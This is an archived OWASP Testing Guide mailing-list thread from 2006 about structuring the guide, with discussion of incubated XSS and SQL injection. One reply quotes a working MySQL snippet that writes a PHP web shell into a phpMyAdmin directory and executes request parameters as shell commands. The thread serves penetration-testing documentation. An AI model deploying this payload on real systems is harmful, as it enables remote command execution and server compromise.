[Owasp-testing] Brainstorming about the new Index

Eoin eoinkeary at gmail.com
Thu Oct 12 17:55:20 EDT 2006


sure,
but we can not take into account every variant of attack for each
vulnerability discovered.
If one discovers SQL injection it is up to them to use a little skill in
order to exploit this vulnerability.
Also all systems are different so the list of variants  would be endless.
I believe we need to take a "middle" approach here and show how to do stuff
or disover vulnerabilities but exploitation it the area that takes some
skill and also alot of trial and error.
Documenting all the "vectors" of attack would increase the workload of the
project and we only have until December.
but it is a good idea never-the-less.

-ek


On 12/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
>
>
> You are right. It is a simple XSS incubated attack.
>
> But on the other hand, now that I continue to think about it... What
> about using a SQL-injection vulnerability to upload code to the Db, next
> if the server has shell enabled this can be used to execute this code?
> (I Googled an example of sth like this for attacking PHP's PMA that I
> copy below.)
>
> The point is that if the pentester discovers a SQL-injection, he might
> be able to do a lot of things. It appears that the SQL-injection gives
> the pentester a new /asset/ (the ability to make certain queries to
> certain tables in the Db). After it, with all the information he has
> gathered so far, the pen tester will decide what to do. Probably, he
> will want to research the implications of the SQL-injection
> vulnerability. Collegue Gerardo Richarte has proposed this methodology
> (see, e.g., slides form his PacSec Japan 2003 talk) over the traditional
> (IG, Attack, Pentrate and report) approach.
>
> Moreover, sometimes during a pen test it isn't just enough to discover a
> SQL-injection. You need to prove the impact of this vulnerability to
> developers that think it is inofensive and shouldn't be fixed.
>
> Then my question is: should we include a prelude on pen testing
> methodology before 4.1? Then, in accordance with Matt's suggestion,
> should each section (e.g., XSS incubated attacks) include a subsection
> where all the attacks assume that condition X holds (where X is some
> sort of SQL-injection vulnerability was found, or such permissions are
> badly set, et cetera)? I think this might be beneficial to the readers.
>
> Ariel
>
> --
>
> use mysql;
> CREATE TABLE temptab (codetab text);
> INSERT INTO temptab (codetab) values
> ('<? $cmd = $_REQUEST["-cmd"]; ?>
> <html>
> <head><title>help.php</title></head>
> <onLoad="document.forms[0].elements[-cmd].focus()">
> <form method=POST>
> <br>
> <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
> <hr>
> <pre>
>         <? if($cmd != "") print Shell_Exec($cmd); ?>
> </pre>
> </form>
> </body>
> </html>');
> SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
> DROP TABLE temptab;
> FLUSH LOGS;
>
> Matteo Meucci wrote:
> > Yes,
> > I think you are right: this paragraph already exists.
> > look at:
> > (http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents
> )
> > 4.6 Data Validation Testing 0% TD
> > 4.6.1 Cross site scripting 0% TD
> > 4.6.1.1 Incubated attacks 0% TD
> >
> > Ariel may be says that Incubated attacks are a combination of SQL Inj
> > and XSS, but we can reasonably affirm that is a particular XSS attack.
> > In the same paragraph we can show an example that how a XSS Inc Attack
> > works exploiting an SQL Inj vulnerability.
> > Right?
> >
> > Mat
> >
> >
> >
> > On 10/12/06, Eoin <eoinkeary at gmail.com> wrote:
> >> Hi,
> >> incubated attacks are important enough to warrant a section under XSS.
> >> It is
> >> another varient of XSS.
> >> Metteo what do you think?
> >>
> >>
> >>
> >> On 11/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
> >> > Hi all,
> >> >
> >> > my first post and 2 cents here:
> >> >
> >> > I guess we should make a difference between the techniques of unit
> >> > testing and the results of UT. Even if UT can be used to... e.g.,
> >> > discover BO or SQL-injection vulns.
> >> >
> >> > Although, I noticed that there is an Appendix for fuzzing which is
> >> > another technique for discovering (some) vulnerabilities.
> >> >
> >> >
> >> > A new question: imagine the following situation: The pen tester
> >> > discovers a SQL-injection vulnerability in a webapp he is auditing.
> >> This
> >> > vuln. allows him to store some javascript in the Db and therefore
> >> > perpetrate a XSS attack (incubated) on the users of this webapp.  My
> >> > question is where do we describe this attacks? (I think they are
> >> > important enough to be included somewhere.)
> >> >
> >> > Cheers,
> >> > Ariel
> >> >
> >> > Eoin Keary wrote:
> >> > > Hi,
> >> > >
> >> > > Question:
> >> > > Do we want to get into Unit Testing and SDLC methodology in this
> >> guide?
> >> > > I thought they would be more suite to Andrews dev guide or the code
> >> > > review project.
> >> > > unit testing is related to testing small blocks of a syaytem
> >> > > individually and hence a development phase done prior to system and
> >> > > integration testing.
> >> > > The Guide currently focuses on penetration testing which is "After
> >> the
> >> > > Fact" testing and not really one until the system in developed.
> >> > >
> >> > > What y'all think?
> >> > >
> >> > > Eoin
> >> > >
> >> > _______________________________________________
> >> > Owasp-testing mailing list
> >> > Owasp-testing at lists.owasp.org
> >> > http://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >
> >>
> >>
> >>
> >> --
> >> Eoin Keary OWASP - Ireland
> >> http://www.owasp.org/local/ireland.html
> >>  http://www.owasp.org/index.php/OWASP_Testing_Project
> >> http://www.owasp.org/index.php/OWASP_Code_Review_Project
> >> _______________________________________________
> >> Owasp-testing mailing list
> >> Owasp-testing at lists.owasp.org
> >> http://lists.owasp.org/mailman/listinfo/owasp-testing
> >>
> >>
> >>
> >
> >
>



-- 
Eoin Keary OWASP - Ireland
http://www.owasp.org/local/ireland.html
http://www.owasp.org/index.php/OWASP_Testing_Project
http://www.owasp.org/index.php/OWASP_Code_Review_Project
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-testing/attachments/20061012/e3ef4f7e/attachment-0002.html 


More information about the Owasp-testing mailing list